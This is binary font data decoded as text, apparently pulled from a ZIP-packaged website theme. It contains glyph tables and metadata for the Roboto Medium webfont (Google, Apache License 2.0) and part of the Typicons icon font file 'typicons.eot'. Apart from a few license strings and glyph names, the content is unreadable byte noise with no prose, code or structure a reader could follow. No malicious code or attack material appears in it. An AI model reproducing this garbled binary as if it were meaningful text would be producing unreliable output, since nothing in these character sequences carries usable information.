9��901!3!#"&'7326?!	��
�@+��E 
0BO(	�
��:�xl�"q��Z;b�
����`>U�
+��+��/�/� /�ֱ
�22��+�

�!+��
99�
�9��9013>32#"&'326=4&#"��2�[����\�3 jN|{}|Lj �`���BG�����B@���9=����A:�K��z�+�3�	�2�+�3�
/�	��/�ֱ
�� ���/���+�� ��
�+��
99��999�
�
9��901!3!#"&'7326?53353	��
�@+��E 
0BO(����:�xl�"q��Z;b�����e��J�%��+��+��+�
�+�"�
+���&/�ֱ
��+�
�
2�
+�@		+�2�@
	+�'+��99��9��9�
�901!2!!!!!!# 3267.#"eAE�Ox�$}���\�C�����3e15e1��@0	L	�e�3�
K
��8��S��N"09�� +�3�&�2�+�
3�-�72�2 
+�2��:/�ֱ#
�#�)+��12��3+�

�;+�)#� 99��99�3�
$9�
�99�& �99��9�-�9015432>32!3267#"&'#"7326=4&#"%!54&#"S	��A@�q��]�{b�AN=ʅ��AAǀ��|��}�ijZt�5e[[e��ߏ��0-�6JcZ[b4��Ǟ��ɛgg��
�
i�+�+�3�	/�
3�
	�2�/�ֱ
�+�	
�	/�
��
+�
�+�	�9��9�
�9��901!	!#53353
^`��������<�O�5������<�+�/�3�+�	/�ִ+�
+��9015%3#'��
��������Q�O�
/��
+���/�ִ
+��	+�

+�+�	�
99�
�9��
90146323265#"&#"�wZ8�4&8�xZG�3'6�^�Y@.'_�YA-G	T�5!G
	��G	T�5!G
	��G	T�5!G
	���m�1�/����/�+015!�>m��}m�1�/����/�+015!}8m��B�[%�/�+�/�ֱ�+��90153B�w<��e���E�^%�/�+�/�ֱ�+��90153E<ݢ�\���B��[
%�/�+�/�ֱ�+��9013B<ݛ��	
���B��B�/�3�+�2�/�ֱ��+��
+��9��9��90153353B�w<l�w<��e����e���E��B�/�3�+�2�/�ֱ��+�
�
+��9��9�
�90153353E<ݢ�<ݢ�\���\���B��"B�/�3�+�2�/�ֱ��+�
�
+��9��9�
�90153353B<֢�<֢�'���/�����D�
.�/�	+�	+�/�ִ
+�
+�+0154632#"&�xefyxfey�M^yx_M`uv���E�+�33��	22�+���/�ֱ
��+�
��+�
�
+01353353353�����������l�3�!�/�ִ	+�2�+��90153#l ������p�qT��!�/�ְ2�	+�+��90173T��� �����z�zK����+��'+� �
+�3��2�'

+�3��2�'

+�3��2�'
+�,/�*ֱ22�
�22�*
+�@	+�2�*
+�@*	+�2��
+�-+�6�&�
.��
.ɰ6���U+
����
����P��+��
+��+�
 � �#9�9�..�....�@� �#901535#535432.#"!!!!3267#"=K���#�<tC6q8���4�4��9p48{>���À��$��rÀ�p���d�b���	+�
33�+�222�	+�+�	+�+�2�/�ִ
+�
+�@	+�
+�@	+��+�
+��+�
+�+��

99��$9015!##333#'#d��uI����n�=�Q__�E��C��u��=��J��881!88��-z�+�3�+�33��2�
/���/�ְ2�
�2�
+�@	+�
+�@	+��+�
�+��
99��
	99�
�
9��	9015354632.#"3##3���H�\%>xFmf���g���\���aa\��z��z:��*R-s�+�3�+�3��2�	/�3�	+�
��/�ְ2�
�2�
+�@	+�
+�@	+��+�
�+��	99�
�
9015354632.#"3##3*�ð#H-1OO�������~��
�ZT~��z��z��*�-/3��+�-033�+�)1$3��+222�
/�%3��2�4/�ְ2�
�2�
+�@	+�
+�@	+��.+�2�-
�(2�-.
+�@-+	+�.-
+�@.	+�-�0+�3
�5+�.�	99�0-�%99�3�"!99�
�
"99��	!99015354632.#"3##!5354632.#"3##3*�ð#H-1OO������H�\%>xFmf���g���~��
�ZT~��z��\���aa\��z��z:��*!-/3��+�-033�+�)333��+222�
/�"3��2�	�!122�4/�ְ2�
�2�
+�@	+�
+�@	+��.+�2�-
�(2�-.
+�@-+	+�.-
+�@.	+�-�0+�3
�5+�.�	99�0-�!99015354632.#"3##!5354632.#"3##3*�ð#H-1OO���*�ð#H-1OO�������~��
�ZT~��z��~��
�ZT~��z��z��S��_<�����$W�y������W��D��%��B�<�i�d>ZB���uD�6�G<�G�h���W�V�8���t�E�a�R%� i?��*��/![( �jB�����gn��M�|@(�T����vg+��gL�`�t�(2�
�X1�W1k5��PZR��3Q�S<Y�*�T�}���0�����~�S���S��)X��{ �%!U�8��Qu��}[�Q�]����^�DW�t�bm�GDW��
K_arch�x��>B�m5W�w�j�f��x`((((((���j��������M��M�M��M��`$��vgvgvgvgvgDM{gt�t�t�t��
����ZRZRZRZRZRZR�43Q<Y<Y<Y<Y��������<�~�S�S�S�S�S�C�S�{�{�{�{���e;S�
����������BB��k�G�G�G���}�B�E�B�B�E�B�����rliT�MK	d8��*w*�*,,,,X�p��>^���4Xv���&�^�N�4��			>	V	�
�
�&��8��

F
�
�
�:��0�F��.b���4Vp�|�J����4r��B��Z�h��P��Hf�&��&�� 4 T | �!\!x!�""n"�##Z#�#�#�$
$T$v$�%�&F&�&�'&'f'�(6(�))�)�*6*�*�++<+l+�,,�,�->-�.,.�.�/D/�/�080�0�11�22�383�4�5J66�77v7�8~8�8�99D9�:>:�;;p<<x<�=*=�=�>J>�??r?�@dAA\A�A�A�A�A�A�A�A�A�A�A�A�A�A�A�A�BB(BLBpB�B�CCBCrC�C�C�C�C�D�E"E.E�E�F�GH�Ff	>	]	a	a	a	,e	�	@�		�	�	&�	
\	Tu	�	�	�	��	�0Roboto Medium Regular WebfontFont data copyright Google 2012..Version 1.100141; 2013Roboto is a trademark of Google.GoogleGoogle.comChristian RobertsonLicensed under the Apache License, Version 2.0http://www.apache.org/licenses/LICENSE-2.0RobotoMediumRoboto MediumWebfont 1.0Thu Nov  7 15:26:25 2013�jd�	

 !"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`a��������������������	����������bc�d�e�������f����g�����h���jikmln�oqprsutvw�xzy{}|��~����������

�������������glyph1uni000Duni00A0uni00ADuni00B2uni00B3uni00B5uni00B9uni2000uni2001uni2002uni2003uni2004uni2005uni2006uni2007uni2008uni2009uni200Auni2010uni2011
figuredashuni202Funi205FEurouniE000uniFB01uniFB02uniFB03uniFB04�����K�PX��Y�F+X!�YK�RX!��Y�+\X� E�+D� E�+�+D� E�+�+D� E�+�+D� E�m+�+D� E�>+�+D�	 E�3+�+D�
 E�	(+�+D� E�
'+�+D� E�+�+D�
 E�+D� E�
6+�Fv+D� E�&+�Fv+D� E�^+�Fv+D� E�-+�Fv+D� E�,+�Fv+D� E��+�Fv+D� E�++�Fv+D� E��+�Fv+D� E�)+�Fv+D� E�(+�Fv+D� E�+�Fv+DY�+R{�qPK!7�LHl�l�&it_sanctum/fonts/typicons/typicons.eotnu&1i�l�P��LP����TypiconsBook�Version 2.0.3 ; ttfautohint (v0.95) -l 8 -r 50 -G 200 -x 14 -w "G" -f -sTypicons�pFFTMl3��OS/26mQ�`cmapNNY%x�cvt s�N|Hfpgm�
x;|d	�gasp|@glyf�0\]�head�9Oc(6hheadBc`$hmtx��c�:loca\ah��maxpK
�kd name��'k��post-�An&prep������V�=��������������1PfEd���O �8Z � ���O�����	

 !"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLNOPQRSTUMVWXYZ[\]^_`abcdefghijklmnopqrstuvwxyz{|}~��������������������������������������������������������������������������������������������������������������������������������	

 !"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOP!*�)@&YMQE+3!'3#!	�����f!X���y+@([[OSG+  &264&"2#������Γ�Γ�V{{Vy�����|�В��8z�z�M��(Z`gk�@MB
'	a_V9BK�	PX@A
`[[
	
[
		YOSG@Bh[[
	
[
		YOSGY@1hh[[hkhkjigf[`[`USPNHGA?<:43/.*)!
+4246;&546232#".547&"2654&"3264&+5>54&"#";.5475>547#&42MT��J3z�z$92jQXdO�`>2d"��"aE��$/IhI0#��Ea
T�$0p}T�TT�3J&-VzzV-&$"%?k�02>`�O?%Nx��xLr4"2
>*4II4)?
2"��rL-%_1��K0%�TT	��
�'/7?G:@7<7,'	BjkOSGEDA@54%$+'&676&'&6&7/76%.76&6?%&/7>2"&4�**
��{{!#k)*
�#zz!�w
69tt9"
69tt9"���nn�o�z!#��***��z!#[*
**�"t�N
69tW"t�
69tio�oo���G�19L@I$	-B		hhi	[OSG76#&#&
+$2"&5462#"&46;5.546232+>54"264
"��"_H��%.IhI/%��H_�""�y��yKs4"2
@(4II4(@
2"��sK{""��P'1R@O	[
Y[OSG)(
-,(1)0!'&

+2+"&4632#!"&4632#!"&5463265!3�		}		��<qI4��4I��6,$""}��4II4M�_#�����d'@@=$%&BkYOSG#"''"+%#"'.'&'&47>%./55�
0}TF��G�����g�j%��JA<"$"G敦Te�����;4@1B?hOSG
+2.'#"'	6$��@�j��;jՐ*aCh����*<@9B(!?[OSG%$**+&47>54626%"764&"4&"'&M��%%"e$IhI$f"%%���#�"�X)%f%" �4II4� "%f%�#��#���m�����H�@?ja%+	&4624632762����2DB1#"1B}2D��D2B."11"��B����@?ja+'&46246276���#`"`#��#_<��_���d(H@E! 'Bk[OSG#"((+"&=4675476'&=%77'"6*��G��FT}0
8*��j�g!*��G"��$��"<AJ�����eT�;+@(B?hOSG+462	"&=5467M"��"j�@������hCa*����%N+<@9B[[[OSG#$#%+%"'	6232+%264/!264&#!7654&"�Jf%��)#j#% �4II4� �x�#���m�#23J%()##%31#IhI#��"�"����'3@0BjkOTH
+2#!"'	62m"10#��BF��DBV1#"1BEEB\�3@0BjkOTH
+2#!#"/762���_��#_V"_#��#_���yB[v@sI#ZB[
[	[
\

[OSGURNKGE>;852/,*&%! BA	+2#!"&46;276264&+764&"264/32#!"&46;264&+"3%#"/+"3!2654&'q3JZv�y��y��y)1"y$^VznMW5"��"5W+=I4��4II4))V{{V�1"#�	*)#12"w"1
yJ3�gy���x$��{�z6#��#6IhIIhI"z�{�"1�1"#11#/2�O+��$BK�
PX@(^`\OSGK�PX@)^h\OSG@(jh\OSGYY@'&"!
++	+2#!"&4632#"3!264&+"/7622MozV��VzzV4II4N4I>+V5
 
��"5�{�zz�{"IhIIhI6"

��"6���#1G]t�@�BosrhgcVB		h

hfhfh

[		[
Y[\ZOTH_^IH$$qpkifd^t_tZYTRNLH]I]FE@>:853$1$0-+('#"
+!!#!467'!>54&"#"326=3264&#5#";32?26264&+764&#"54&"26;57#"&547#6�./%��
G)��/%"
@�"}�"�J�B��"�`B��"�"2

Q"1	V���(@
��%/$(@
'%.����"���"}�"�#�B�q"�#�B�M1"V	2"V	���y+9G�@�
	+
B

h
f
f
f
f

f	[	
	
[

\OTHEC@>;:7520-,('$!
+3"&=#"&4?#"&466232+54626"&=32+2#"&46;54��"��B�"�B�*";"�}f"�}y�B�#�"�}#�"�B��"}�"}���,:Qgow��@�*	&
Ci 	
qb
BA		[

[[[

[[[O[THpphh--���|zpwpwtrhoholjfe`^ZXUSQOLJGFA?-:-96410)'%#,,+2#"'#"'#"&54?&547&=326327626=3264&#%64'&#"54&"3264&+5#";32?265+6;547;54&"#"�3J%% -�
&;2#%%13J%')�	&92"$%�@"Sk

�"�B��=��",�'o�"Q�Jf%%#09&
�.!&%J34%'#.5&�-$%��S"
"

�B�"���"�#�G^)*`
, �"�T���y#1Fp@mF	B

j

jhi[\	[		O		T	HCB?=:843/-*(%$!
+3"&=#"&4?#"&4>"&=32+2#"&46;546232+5462X�"��=G"�Sf"�S`"�B�"�G�#�"T�"Tl�"T�#�"�B���P�]ciou�@�0( tl;
h`VNFBh	hO[
Z


Y[SGppddpupusrnmkjdidigfba_^XWTRJHED?=9721.,$"]]'%+#"'&476322?'&#"#53264/32?#764'&#"32764/3'&#"764&#"53'#634%25'35#&5"'��w!"�w�"!�
��

6�6��6�6

��

6�6��6�6
75��55gE�x�E���
��

"6�6#��#6�6"

��

"6�6#��#6�6"
T55�55���D�@%B=5.@?K�
PX@-	j^`i
M
RFK�PX@.	j^hi
M
RF@-	jjhi
M
RFYY@DC?>;9%#+#"'&4?#762'&4625##"/76235"&4?#"/3'&462v��

6�6#��#6�5

��#5�6#��6�6#ƚ�

"6�6#��#6�6"

��"6�6#��#6�6"�8�y@d��@�Y-Q

cxG	
BA[[

[

[\		[[OTH! ����|zvtomjg^[WULIEC<9640/+*&$ @!?	+2+"'#"&57.546;276264&+764&"264/32+"3%4632>;2654&'#"/+"&64&+";32?'&#"#"&46;2q3JZv�y*0#x%43JZw�y)0#y$^VznMW5"��"5W+=I4*��1"#�	**"1
1"#�	*)#1
})V{oMW6

��

6W+=I4)yJ3�gy� x%J3�fy� y$��{�z6#��#6IhI"�"1�1#/"1�1"/�"z�{6"

��

"6IhI���y=�@
#BK�
PX@7^`^_	
\OTH@7jhfk	
\OTHY@;9641/,*&%! 	
+2#"&463264&+"/76262"&4?#"&4632#";'&2MozV4I>+V5"��"5��"��"5VMozV4I>+V5�z�z"IhI6#��#6���#6z�z"IhI6��%N3E@B+B[[[OSG.-)($"33#(	+"&54>7#"&46;.54762	"3!2?'&"�fJ
�4II4�$#k#)�����#��#�KJ3	
	IhI	
	4$##���R"�"������')@&BjkOTH$%+62	"'&4?!"&5463!'&4?D��FB��#01".B��EB1"#1BE\�)@&BjkOTH#$$+62#"&4?!"&463!'&�#��`��<`���#_"_���y2J�@'
DB7BK�
PX@7^`^		_\OT
H@7jhf		k\OT
HY@HFA?;9541/+)%$ 
+"&46;2&#+"&46;26?>;'&462#"&4?#"62#"&4?#"'67;'&*�I5 -�p:hhH�GL5#��5L+\�#��5a_>>'a5�"7**�:Pk"J8;Ok6#��#6Nq��#6P*1'16��
@?a
	+2	&463�
����� 
��"��@@a
+7"&547	#*
���
 � Bg��@	_V�kys;3BK�
PX@E		`	fh^		[

[[OTH@G		h	fhf		[

[[OTHY@ihwuh�i�ca/&$.&."
+4632#"/&'&54767&67654'&#"764&#"3264'3264'.5476732?'&#""&'76327654.7�J34%�ot6@I34%�ot6@�wW[V"C<S4��XwU\V"C=S5

��

!07b"!078b�3J%�	o��t53J%�	o��t6�MW[�tV#"A,_C<4#��#�U\�tV#"@-_C=6"

��

"��- 7N$1)a- 7M$28*b�bq� C�@@7BK�
PX@4^hh_\OSG@2jhhk\OSGY@
$)$+#"/76267654&'&462#"'&54767'&462#"'&4?q\Wv8��#4S<C"#V��"V\Uw7#��

5S=C�\W7#��#4<C_,A"#Vu,A"#Vt�\U7"��

"6=C���
$@!@?ja
	+"&47	#2	&5463*

����V"��
 T 
������)3@0B#@[OSG+"&=&'&47	'265264/27�hI$e"%%()%%"f$�"�#��#KI4� "%g%)��%g%" �4�q��#��#����H�@@ja%+	"/#"&5"&47$2DB1"#1BD2���D2B��#01".B2D2�7@@ja+"/"&5"&47��"`"`#7�#`��<`#���y1;L@I
	B[

[	[OTH32862;3;'#"#"%+ #"'#"&463263226=4&"3276#"&264&#"��I4>&-@<UU</'
"�Γ�gN?"Si��M%%%%yÊ4I22VxV}h��В+
"
9��%2%$4$���4CN@K3Bhf[[OSG65=<5C6C&%&	+"&54?632"'&4?&52764&#"32?654'2"&5476@�!#1�1D"1b�1&1bED1�>*+Y��h�I��IВI'I
	�F1�1F&2!1�b1'1�b1�*+>X#"���hgI��I�hgI'I��t=1A@>+B[[OSG)(#"
11+7"&54?62#"&4?27>764'&"2?�*>�1�b1��1DEb1!0F1�1E��X�=+,�1b�1��1b�1!1'F01�1F��"!Y��jP*CA@>?92+Bh[OSG640.&#
+!"&'.'&4?>3!23!2654&#!"#"/#"&?'&>76�_-_i�_-�4II�;c<��_<^�o

nn

nn	
nnK0%%�%�%1I4�_4IM&��"�"n
nn
no	nn��@P4:@7-$B[OSG1/+) 	+2#!"&/&7>7>3'764&"'&"32?32764�+==+�_(U�

iV(A__#_`#``

`_

P=+�_+=, �%�% -�h_`#``#`_#

__

#�	/:@7	B[[OSG5552+!!?'7%2##!"&=463!254&#!"3!26}�6�l1�n�#12"I4�64II4�4IS�6��.aOa}1"S#14II4�4II����#/EU@@=[	
[


O

S

GTQLIDA<976+$"&=462"&=462"&=462"&=46272##!"&=463!254&#!"3!265""�""_""�""�#12"I4�64II4�4IS�6�����������1"S#14II4�4II����#9I:@7	
	
[[OSGHE@=852+$"&=462"&=462"&=46272##!"&=463!254&#!"3!265""�""�""�#12"I4�64II4�4IS�6���������1"S#14II4�4II����!1/@,[[OSG5552+6"&=462%2##!"&=463!254&#!"3!26�""�#12"I4�64II4�4IS�6�����1"S#14II4�4II����-=4@1[	[		O		S	G<9552
+$"&=462"&=462%2##!"&=463!254&#!"3!265""�""�#12"I4�64II4�4IS�6�������1"S#14II4�4II�����qP+7@4[[OSG! '$ +!*#3%2	+%#!"&767#"&463!2+7!2/#!"'3q@5�_5@g0�1W�+M&2��1d6OO6|""��������#<K[e}@zD
T
B		Y

M
[

[[[OSG==%$dba_ZWSQPONM=K=KJIB@961.,*$<%<+7"&=462"&=462"&=46272+#!"&5463!2%32?6?35###"'3!26754&+326�

T



S



�<VV<I4��4I0#w#1�5%$��/ 3$$�%>>%p�

��

��

�V<�<V4II4"11"**?% 
*���)*�t��%��%����%05;Q@NB
[		Y[OSG21'&:976431525,+&0'0""+%+"&'#"&7>5467'462"!&54&27#'!&'!��ZrY�
]J0F1J^
��EaUbD1�����O27FF74
.7]4Q�"11"�Q4]8-�aE1#+)Ea��))}4II����&5O@L
[	[		[OSG42/-,*%#" 
+2+#!"&54?633#%4&#!!2674&#!!2326q4I<,
A(��4I}**T���$}�G*f4I�I4�_4I$/I4�}�e�_*w�5d�*I4����G�%2S@P-(!.'Bk	[[OSG20+*%$
+2#"/&"&'&5463"7624&#5'&"7632�4I'"�#� C
I4f,},fNx� \ �x$54�I4��)+��H4IT�c^))^��x`xx`x$���y'1=U@R[	
	[


[YOSG32962=3</,)(&# 25+2#!"&546346;2"!4&#5!3!26%!54&#!"2+"&463q4II4�4II4I4�4I��N������H�NT�I4��4II4#4I4II
�6))d�S""����!(-2@/-+)(&$"	BjOSG!!,(+#"/&76767%632267'767&'767�'l��

}U=	<6Z�#��9P+>I
�,C��Mƒ�'3��Sk	=eMEl�dG7+`A� C'$��M����y+7=In@k
[	[		[[

[OSG?>.," EC>I?I=<:941,7.7(% +"+
+!"&5463!2"3!2654&##"&46;2'#"&46;2742"2#"&546�e4II4�4II�1��_�������S-;<,/99!I4�4II4�`4IG�`���""�""TTS#$$
��G�'/7?GOW_gko�@�[YY	
[


[[OSGlllolonmkjihgeca_][YWUSQOMKIGECA?=;97531/-+)'%#!
+!"&5463!2"3!2654&#432#"7432#"7432#"432#"7432#"7432#"432#"7432#"7432#"#37!5��5HH5M5HH�~M��*))*}*))*}*))*�*))*}*))*}*))*�*))*}*))*}*))**��)��KH5�5HH5�5H����))**))**))*S))**))**))*S))**))**))*�)S}}����'3=Q^@[
B[

[
[	Y		O		S	G>>>Q>QNMKJHGEDBA<96+#!"&546754623462#26=4&"26=4&"5!3!2654&#"&5#"&5"�%.I4�4I.%IhITIhI�""��""��1D2�2D1
@(��4II4w(@
4II44II4SSSS����5S#11##11#S����'3=x�BK�
PX@*`[	Z		O		S	G@+h[	Z		O		S	GY@
<96
+#!"&546754623462#26=4&"26=4&"5!3!26�%.I4�4I.%IhITIhI�""��""��
@(��4II4w(@
4II44II4SSSS������Ay5=HRj@g[[

[
	
[		[OSGJINMIRJREC?>;:761.+(# 54	+!"&546;7>;232"3!2654&+"/&+"#"264&2#"&54%2"&546��4II4B*8�9)B4II��GS6�6�V>>V=�zTU<=U� .  !I4M4I**I4��4I���M66T=V==VgU=<VV<=b .  ��Ay$.I@Fh[[	O	TH+)&% $$	
+2#!"&546;7>;22654&"$264&#"�4II4��4II4B*8�9)�<UTzUU .  &I4��4II4M4I**�_V<=UU=<V�.  ����'/S@P( )B[	[[OSG,*&$
+ &6 "264%"654&'26327'#"&54����$������V<Mo��0\V<�04Nm6�$�������"�<V*oM4/�<V�nN5���y*@'
B[OSG(%+  &327654&#"�����}zV2.���{V1.y�����Vz.�00Vz����(4A@>B[[OSG+)1.)4+4('	+2#!"&=4?>764&#"/&!!"&463!2q4I�f�g'E\&e
t f
#
�	H)�f��K2�_}-!�&
5r/}�
M

�S�""���y)@&
@jOSG+!54?>7>2#!"&463�f�CftD�f&�_}�L���""����#+7m@jB[[[	
Y

O
S

G.,$$41,7.7$+$+('## 
+2!5463254626&"3454&"!4&"!"&463!24I�eI4/$IhI$�"S�"�"}��GPI4���4I!�4II4J!S�6��%��$��""����%;@8OOYOSG!%$##	+#4632#4632#54622#!"&463��1"#1Ч1#"1�_�0F0���y��#11��N"10���"11��""���y/;V@S
-"Bh[[OS	G20850;2;+) //
+7".6?>7632/"32?6?6&#"'&!"&463!2}%=�g'E[&<2H�f(F[&l
�
��
#
�
��
h��H\);I�&4q/EZ,�&
4q/w�.�e

�.�d	��""���O#*@'@jOSG#"+7.?>7>/#""&463!2#�CftD6�Cfu)
G�D�	M�,D�	M� �""����$(.A@>.*)(&%
BjhOTH$$"+"+46;"'#"&546727'&'654'1"��J\)Vc�ɕsOUF�_��o	t�	�JJ�"1rIl��s	8ʎw���4��al�7
a
�S�]uv]����@
	@a++%7'%#"&5467%46g�R:	!���May��j1�bO��g�m[��:�yn�"�;7
!���x!*@'B[OSG"+%#"'	62%2654/7654&"�J34$��)#k#$$xx$�x�#��#\3J$))##$54$xx$�����P@BOSG+"'	62���2D��F7D��D2���x!3@0 B[OSG+"&4?'&54762	"2?'}3J%xx%%#j#)��$#"
��

"��!Jf%xx%34%##���$G
��

�����P@BOSG+62	"&4?'&4F��D2��7����2D��D����3?KWt@q[
[

[
	
[		[OSGNLB@64TQLWNWHE@KBK<94?6?2/*(%"	+2#!"&5463;26=4&++"&=#"3!26'!"5463!2'!"&543!2'!"5463!24II4�_4II4S�}*0#�"1*�S��	M	��	M	��	M	�I4�4II4�4IS**���*"11"*�;		}		}		AP+C@@$Bh[OTH)'	+++2+532764/.32?#"&546754632qVzzV�6

}$}

6�EbF7�gP��z�{�5

"}}"

5�bE:Yh�]KLP@Z@W?/Bh	f[[
O
SG=;31.,(&!@@(3+2#!"&546754632264&#"'.#"'";5#"&?6#"/{V{{V�6FkL'�hR�4IH4-\=Ea
; /0#�Y	

}}

	Y�z�{cD5Zg�^J��IhI-<OaE22"#0�Z
}		}
Z���-<N@K:3+#B
[OS	G/.87.</<)(--+%"/762'264/764&""&4?'&4762"2?'&.4%��#k#%%$$%J�#__#y3J%%%%%#k#��%4__#��%��##%g%%$%gJ��#_`#�kJg%$%%g%##��%�#`_#��2%�%@"BOSG+$"/762"'&4?'&4762F��EBB'FBBE��2��DBBDDBBD���P(T@Q
[[[OS	G! 
'% (!(

+%!"&463!22+#!"&5!%2654&+��<VV<2"��"1����%%>""HVxVS#11#w��#�ݦ%%}���KS[w@tG

= 	
	3*BY
	
[		[[MSGYXUTQPMLEC750-(&KJ
+#'7377'7''27632#"/+"&/#"/&6?'.?6327>3"264&2"&4�}$�?jj?�$}#�>jj>�#-;0>,,>0;-}-:0?,,?0:-aF00F1�hIIhIP�)mffl(��(lffm)�#;*l8+*8m);##;*l9**9l*;#��0F01D[IhIIh��>PGQ*@'[OSGIHNLHQIQEB!+7.&/&6?64/.?>6?>;2?6/&+"&'"3264&�=$--
$=)=$-
-$=)I#11#"11E$&,",&%==%&,",&$>c1D10F0����!2@/! Bh[OSG*+"264$  &%6#"&?677'���A6����H�
H#ɐP�������6�H
��9����'-15;EMY�@�		[[[

[[[OSGON22..USNYOYMKIGDBA?;:98252543.1.10/,+*)#!	'&+2#!"&=#"&46;5#"&46;5#"&46;546335"353535#4&#!!26432#"2#"&546�4II4�54I))))))I4)))))))�_���STTSS-;<,/99�I4�4II4*"S"S"*4I}*T�SS�SS�T*���ITTS#$$����#+L@I[	Y
[OSG%$)&$+%*## 	+2#!"&54635!3!2654&#!""4;2#G4II4�64II4����6wT�I4��4II4#4I�`��))�**����.@+
	?kYMQE+!%73?!7!7!p~:5����}���������xx�CGG��W��G�
 (H@E	'$B[[[OSG$+"&57>22675#"'"264267"'G������qVz{V�{{�z��nQ�Q���y��yt���J<XX<�z�{{���UBXXB����'5@2#Bh[OSG$&+  &264&"%#"/#"&?'&676�6������Ao

	nn	

oonn�����6�A���yn
oo
nnoo���y'/@, 	B[OSG$)+  &'764&"'&"32?32764������``#`_#__

_`

y�����``"__"``"

__

"����#3CGl@i
[

Y
	
[		[OSGDD54  DGDGFE=:4C5B2/*' # #"!	+2+32#!"&46;5#"&54635#%4&#!"3!262#!"&5463!k4II4�}�}�4II4ʦ���T�f��f�I4�64IS""SI4�4I��SS���6���N��N������37CN@K
	B[Y
		[OSG9844?<8C9B474743;5+%#!"&54674&5463!23463!2354&#!"!264&#!"3�$0=+��+=0$I4H4I�(�)��G��

��

�9%+==+%9w4II4�����	w��*w�Nw��}



���59�K�PX@3`
[	Y		[OSG@4h
[	Y		[OSGY@"66! 696987/-+*(& 5!4	
+2#!"&54634&#!"3!262+"&5#"&5463#�4II4��4II4M��$S?">���I4�4II4�4I������w�_w������)9�K�PX@3	`[
Y[		O		S	G@4		h[
Y[		O		S	GY@"850-# )(


+2+"&5#"&5463!2#!"&54634&#!"3!26�"�w���4II4�64II4��6�y������I4��4II4q4I�q�����y!.<�@0		+BK�PX@/^k	\		[
O
SG@.jk	\		[
O
SGY@#"<952)&".#-#(!&++#'#"/7.546;546232264&#!"3%7'&#!"3!2�r&V<q!*!\7'kM&.V<�$4%y6'n%%��00n33�x%%��l+6<V��'kMG+<V%%%��%4$00�00%%����+7W@T[	[	

	
[[[OSG-," 30,7-6(% +"++"&462&"264"&462&"2647!"&463!2%"3!264&#�hIIhIl""
hIIhIl""�4II4�4II����IhIIh]""�TIhIIh^""�IhIIhI�""����:@7[[OSG
	!+432#432#463!2#!"�]^^]]^^��0#�#11#�#ȼ����6D11D1����-3Ee@b/B[


[[	[		O		S	G54..?=:84E5D.3.2,)$!
	+2+"&=#"&46;5462%#!"&5463!2'3265#"&=!"3�S"TT"
I4�_4II4MNl%>+=��,"TT"SS�
�_4II4�4I�k-%�5w=+?�����)5Q@NB[[
[	O	SG,*2/*5,5#!)(55+#!"&5463!2'3265#"&=!"3%#"&46;2�
I4�_4II4MNl%>+=��M���
�_4II4�4I�k-%�5w=+?��""����+7COs@p
[[	[		[

[OSGFD:8.," LIDOFO@=8C:C41,7.7(% +"+
+!"&5463!2"3!2654&#!"5463!2'!"&543!2!"&543!2!"5463!2�_4II4�4II�+�*��	M	��	M	��	M	��	M	KI4�4II4�4I����		}		�		}		����)@@=B[[OSG#!)(55+#!"&5463!2'3265#"&=!"3�
I4�_4II4MNl%>+=���
�_4II4�4I�k-%�5w=+?��b� *AHLl@i=6G/	Bh		f
		f[ZMSGIIBBILILKJBHBHFE%*$3+%#!"&5434?6;'&47>5462632764&"54&"'&#"!'#'5!��fT
%%H!IhI!H%%
T����#_"_
%ECFM�����\��	�%f%94II49%f%��#��"_��_
��Ў���}}����8E@BBj	hYOTH53$4%(
+'&46324627632#!"&5434?6;#!'#76732;��_"_��fT
	>8EBE8>	
T�#��#`��`����	�=��=�����@
	(+7'!'77'7'5�ݚ�ݚ�ݚ�ݚݚ�C��Cy����yy���l�y�O�-2��2-���*.N@K.-,+BjY[MTH**%%7+#!"&5463!762	'5+546?#7'���w�2��Z��G݅E��36[6B2�����Z��#E���!B��5�6[6���P(;�@80BK�
PX@6h^[		\[OSG@7hf[		\[OSGY@
65##$%#"%
+#"&'#"&5!23264/3264&#!265264&#""/�[s�zb�-#0�"1���ȇ��"��zzV'kDx	��bx�v[0#�1#��#�"����y�xkEx:V���y.M@J&Bhff	[[OSG.-$###
+$264&#"&4632"&54622+#"/"&5!*�nnMp���"Y���"Gn�o"��pM�"�#��&#/Q@N	[[[OS
G%$
+($/%. ##
+!"&463!2%"3!264&#!"&463!2%"3!264&#q�4II4�4II����4II4�4II���,IhIIhI�""�5IhIIhI�""2��0@-[OSG


+2#!"&4632#!"&463G#11#�#00#�#11#�#01"�1D10F0��1#"10F1���+A_@\	.+*&B8Ajh		Y\[MSGA@$&*%8
+#!"&5463!46267&/#"673!5#"&=54>35!5<��M4J`���O)&>* Zl)���1!�k%6Y8���#5=�G"1f�f��U�(96Q�}�1$}�0^`H-)���y+N@K
'%BAY[[MSG$#"! +*%#	+74>354632#"&="&5463!!!567#�%6Y8��Q�k}M���4 p0^`H-}��U}��GT�}6 ���
%-5?U@R B
[[	[		[OSG<;7632/.+*'&%%+"2767&/2#"'./>762"&4"&462&"2654Ŝ;>FD@;�;@DF>�jO0_	!d0OjkO0_	!c0OZ""^hIIhI[D10F0�*,QO-**-OQ,}9"a
+g"99"a
+g"9�""�IhIIh�1#"11"#��:&'15@2[[OSG0.+*#!'','+#"'.'&7>76322654&#"7"&4632:+d3ZwxZ3d+,d3[wv[3d,�l<UU<=UU�0F11#"1	8g$@@$g8		8f$AA$f8�V<=UU=<V�"11D21�b��EK@H3,(!<?
B*@hfOSGCB:81/%#+"&=.546?>7#"&?&'#"&?&'#"/#"/462j�î�"��ė*d~�	

�	[	

bM��Mb

	[	�

	�}d"�뙐�%33%㐙��#�k��=4[
bmmb
[4=��k�#�����g�@�!
	
[	
	Y"

[Y[[ Y[YOSG  	 g gdcba^]\[XWVURQNLKJIGDC@?>=:9874321.-*('&%#	#+!!%5#2+5##"&546;3554&+!5#"2#2#2#2#;5!326="&4635"&4635"&4635"&46�M��#�N4II4}�}4II4}��*��**M*��*���I4��4ISSI44ITT�*SS*"*"*"*"*TT*"*"*"*"���&@	?a+254&/&63s#�"�!�#&!�H�S�#R�!��G�(8O@L4-&%5,Bk[[[OSG&#	+6"'."&547622.675&75#"'.6323@�@%f("@�@(o�%f(6},'n-:�%f(+(P<'n-**Zc��@@% �@@(% _,'a�% _:'`��G�-@*BkO[SG+6"'."&5476223@�@%f("@�@(oc��@@% �@@(��G�%@"
